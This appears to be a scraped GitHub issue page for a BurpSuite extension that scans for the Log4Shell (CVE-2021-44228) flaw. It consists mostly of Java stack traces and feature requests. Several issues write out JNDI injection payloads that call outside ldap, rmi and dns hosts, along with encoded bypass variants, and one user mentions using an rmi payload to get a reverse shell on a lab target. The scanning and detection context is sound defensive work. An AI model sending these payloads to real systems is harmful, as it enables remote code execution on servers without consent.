f0ng / log4j2burpscanner Goto Github PK
View Code? Open in Web Editor NEWCVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks
Home Page: https://f0ng.github.io/2021/12/22/log4j2burpscanner/
CVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks
Home Page: https://f0ng.github.io/2021/12/22/log4j2burpscanner/
包头里各种 Content-Type、Referer、Accept-Language、Accept、Accept-Encoding等都有可能成为触发点,望加入检测范围,感谢。
java.lang.NullPointerException: Cannot invoke "okhttp3.Response.body()" because "response2" is null
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1799)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)
log4j2burpscanner v0.18.6
win10x64 java version 11
burpsuite v2021.8
长时间开启插件后burpsuite 内存会一直增加
针对xml数据检测
Hi, Any idea why I'm getting these errors? I use the latest version of your extension
Macbook
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
JDK (build 1.8.0_321-b07)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.ei4 @7034e82d)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.ei4 @7034e82d)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1467)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1467)
at burp.dbq.run(Unknown Source)
at burp.dbq.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:831)
at java.base/java.lang.Thread.run(Thread.java:831)
Thanks
java.lang.ClassNotFoundException: burp.BurpExtender
at java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:476)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:589)
at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
at java.base/java.lang.Class.forName0(Native Method)
at java.base/java.lang.Class.forName(Class.java:398)
at burp.b0r.a(Unknown Source)
at burp.b0r.(Unknown Source)
at burp.c73.a(Unknown Source)
at burp.igl.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:829)
例如:
{
user:"sjjsjssjjs${jndi:ldap://1111111}" #这个可以解析
user:"sjjsjssjjs%24{jndi:ldap://1111111}" #这个就无法解析
}
现在这个版本$虽然编码了,burp上显示有漏洞,但是再dnslog上是没记录的,不知道啥原因。(网站本身有漏洞)
现在这个版本没有再重放一遍为编码的poc这一步了,不知道是不是去掉了。
之前的版本是不编码再重放一遍,可以增加一个选项是否编码$
jdk版本也换过了,是编译的问题吗??
java.lang.NullPointerException at burp.dcb.O(Unknown Source) at burp.cz8.getHttpService(Unknown Source) at burp.hy.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:149) at burp.hmr.a(Unknown Source) at burp.bp4.b(Unknown Source) at burp.gj_.a(Unknown Source) at burp.gj_.a(Unknown Source) at burp.dmr.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.ifl.a(Unknown Source) at burp.dmr.addNotify(Unknown Source) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754) at burp.gm0.a(Unknown Source) at burp.gm0.insertTab(Unknown Source) at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828) at burp.d0z.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.cup.b(Unknown Source) at burp.d0w.a(Unknown Source) at burp.iew.addSuiteTab(Unknown Source) at burp.fvi.addSuiteTab(Unknown Source) at burp.exn.addSuiteTab(Unknown Source) at burp.BurpExtender$1.run(BurpExtender.java:292) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.NullPointerException at burp.dcb.O(Unknown Source) at burp.cz8.getHttpService(Unknown Source) at burp.hy.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:149) at burp.hmr.a(Unknown Source) at burp.bp4.b(Unknown Source) at burp.gj_.a(Unknown Source) at burp.gj_.a(Unknown Source) at burp.dmr.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.ifl.a(Unknown Source) at burp.dmr.addNotify(Unknown Source) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754) at burp.gm0.a(Unknown Source) at burp.gm0.insertTab(Unknown Source) at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828) at burp.d0z.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.cup.b(Unknown Source) at burp.d0w.a(Unknown Source) at burp.iew.addSuiteTab(Unknown Source) at burp.fvi.addSuiteTab(Unknown Source) at burp.exn.addSuiteTab(Unknown Source) at burp.BurpExtender$1.run(BurpExtender.java:292) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8) at com.alibaba.fastjson.JSON.parseObject(JSON.java:247) at burp.BurpExtender.doPassiveScan(BurpExtender.java:535) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830) java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8) at com.alibaba.fastjson.JSON.parseObject(JSON.java:247) at burp.BurpExtender.doPassiveScan(BurpExtender.java:535) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830) com.alibaba.fastjson.JSONException: not close json text, token : int at com.alibaba.fastjson.parser.DefaultJSONParser.close(DefaultJSONParser.java:1527) at com.alibaba.fastjson.JSON.parse(JSON.java:174) at com.alibaba.fastjson.JSON.parse(JSON.java:180) at com.alibaba.fastjson.JSON.parse(JSON.java:149) at com.alibaba.fastjson.JSON.parseObject(JSON.java:241) at burp.BurpExtender.doPassiveScan(BurpExtender.java:475) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830) java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8) at com.alibaba.fastjson.JSON.parseObject(JSON.java:247) at burp.BurpExtender.doPassiveScan(BurpExtender.java:535) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830)
为什么右键按钮Send to log4j2 Scanner后插件界面是空的,好像扫描失效,试了很多次还是这样,求解答~
`java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.aii.T(Unknown Source)
at burp.cnn.getHttpService(Unknown Source)
at burp.gvg.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.bpc.a(Unknown Source)
at burp.fno.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.jf.a(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.dc4.b(Unknown Source)
at burp.jf.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addImpl(Container.java:1147)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:760)
at burp.cd6.a(Unknown Source)
at burp.cd6.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:834)
at burp.bxg.a(Unknown Source)
at burp.guy.c(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.ftr.a(Unknown Source)
at burp.d0t.addSuiteTab(Unknown Source)
at burp.i78.addSuiteTab(Unknown Source)
at burp.c04.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:863)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.aii.T(Unknown Source)
at burp.cnn.getHttpService(Unknown Source)
at burp.gvg.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.bpc.a(Unknown Source)
at burp.fno.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.jf.a(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.dc4.b(Unknown Source)
at burp.jf.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addImpl(Container.java:1147)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:760)
at burp.cd6.a(Unknown Source)
at burp.cd6.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:834)
at burp.bxg.a(Unknown Source)
at burp.guy.c(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.ftr.a(Unknown Source)
at burp.d0t.addSuiteTab(Unknown Source)
at burp.i78.addSuiteTab(Unknown Source)
at burp.c04.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:863)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
`
0.15更新
1.增加dns与ldap可选 少了rmi的我之前在某个帖子回复你添加,估计你没看到。
目前插件支持的payload格式是${jndi:ldap://xxx.ceye.io/test} ${jndi:dns://xxx.ceye.io/test} 由于漏洞服务器JDK和组件的问题${jndi:rmi://xxx.ceye.io/test} 这个缺了。vulfocus的靶机就是用这个payload反弹shell成功了。
意味着Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
用的是JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。
如添加自定义bypass payload扫描,如:
%24%7Bjndi:ldap://%24%7BhostName%7DXXXX%24%7B::-.%http://upnnhdrm4xboo3bhucusb6x64xanyc.burpcollaborator.net%7Dzzzz
貌似awvs代理过来的流量和burp自带的爬虫插件都没法加payload,手动勾重放器测试是可以的
custom header lists置空,依然会有jndi payload出现在请求报文里,导致请求异常
目前收到很多来自你插件的无意义被动扫描,请把 咕.com (xn--9tr.com) 全局加白。感谢。
在本地搭建的两个靶机(post请求),还有一个真实站点(get请求),依次手工测试都存在漏洞的,但是插件只检测到最开始的一个存在漏洞,后面的两个站都没有检测到
包头里各种 Content-Type、Referer、Accept-Language、Accept、Accept-Encoding等都有可能成为触发点,望加入检测范围,感谢。
在靶场中测试,0.16.7版本打payload会把"$" URL编码,会导致payload无法被加载。
1.payload的请求设定建议在每个payload上加入数字顺序。意思就是比如包里有5处可以插件自动化输入payload的地方,那么5个参数的payload可以是test1.XXX.ceye.io依次到test5.XXX.ceye.io的方式。这样在查看ceye.io log的时候就知道是哪个payload触发了漏洞方便定位数据包中的漏洞点。
2.能否增加一个内网检测的参数进行切换可以修改自定义的请求rmi和ldap的地址,用于快速检测内网不出网资产的漏洞验证。利用插件帮忙自动化输入到参数进行测试可以节省很多时间。
这几天漏洞爆发很多业主单位都要求排查漏洞所以这个需求还是很关键的。
First of all thanks for this tool. Everything works perfectly. Except one very important thing. It doesn't report the vulnerable parameters. Do you think you can implement this?
Cheers
研究了半天没发现咋用,有没有表哥带带我
这个插件是自动执行的么,我只需要抓包即可?
靶场就刚才我邮件发你的那个,我配置了ceye.io的域名dns收到请求了但是插件没有提示有漏洞。图片我通过邮件发你了。还有采用默认的dnslog就检测到一次,接来下全部都没有检测出来。具体原因不清楚可能需要你自测一下。我邮箱把图片发你,你看看。
你这边得小心了。不知道会不会影响到。建议弄个圈子群什么的内部发吧!上次说加个微信你都没回复我,你看看邮件。
我发现有些网站请求地址太长而导致都是一样的 没法定位到某个具体参数,可不可以增加一个随机的字符串标记以便定位
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1474)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
但是对jndi:ldap://有反应
cant seem to find the passive option diplayed on the git
https://user-images.githubusercontent.com/48286013/146666473-83b53bfe-7a41-4379-b22c-a1085125e2e7.png
环境是jdk11+bp(2021.5.1版本)
问题一:被动扫描打开后,没看到发送检测的语句。
问题二:使用主动检测时,ceye检测时,ceye后台已经看到请求的数据,证明存在漏洞,但是插件未显示。
加载插件后配置好配置,但是在截取数据包的过程中没有被动扫描log4j
这是生成的payload %24{jndi:rmi:://ip:port/%20test}
1.内网很多时候不会特意搭建dnslog来测试,更多的是直接启用jndi服务然后存在漏洞的资产主动回连你所设置的ldap/rmi://ip:port/xxx。插件的设置只支持内网的dnslog格式而且不带域名解析的情况下生成的参数根本无法正常访问。目标机子没有你的域名解析记录,所以只能是完整的IP格式
错误的:${jndi:dns://0.POST.192.168.80.10.hello.192.168.80.6:8001/%20test}
正确的:${jndi:dns://192.168.80.6:8001/%20test}
这样的情况就会出现没办法定位漏洞参数位置,但是可以找到存在漏洞。需要进一步手工一个一个参数测试。不能依靠域名解析时候携带的数字编号进行快速定位了。这部分的优化时可以把内网的dnslog配置直接用ip:port的方式代替,出不出网都没办法解析到你私有化部署的dnslog。
2.还有dns改rmi发送的payload还是dns。改ldap干脆就不发送了。干脆3个轮流遍历一遍这样能省去很多时间,特别面对众多资产的时候3个参数轮着改还要所有访问再执行一遍效率很低。你可以加个开关要么指定要么默认3个都测试一遍。
3.{jndi:dns://0.POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce.xxx.ceye.io/%20test POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce. 这部分有点多余是不是可以考虑简化一下,万一域名带奇怪的内容反而回连时触发了安全设备的规则。保留数字的部分0.xxx.ceye.io/%20test即可。
4.jndi:绕过的几个格式都加入到默认发送的状态,保证漏洞定位的准确性。
原因在于jdk版本,作者的jdk版本为1.8_231、1.8_151,测试都是正常的,请不要再提交类似issue,jdk版本太多,无法做到全版本兼容,请谅解
插件目前应该是一次性替换所有请求吧?的确可以减少发包的数量。
结果遇到个问题,漏洞点在waf上,但是一个包中所有参数同时被替换结果触发不了,只有当单独某一个参数为payload才能触发。
还有就是,当勾选header其他参数测试时,原数据包本来不存在的参数被添加,造成请求异常等等
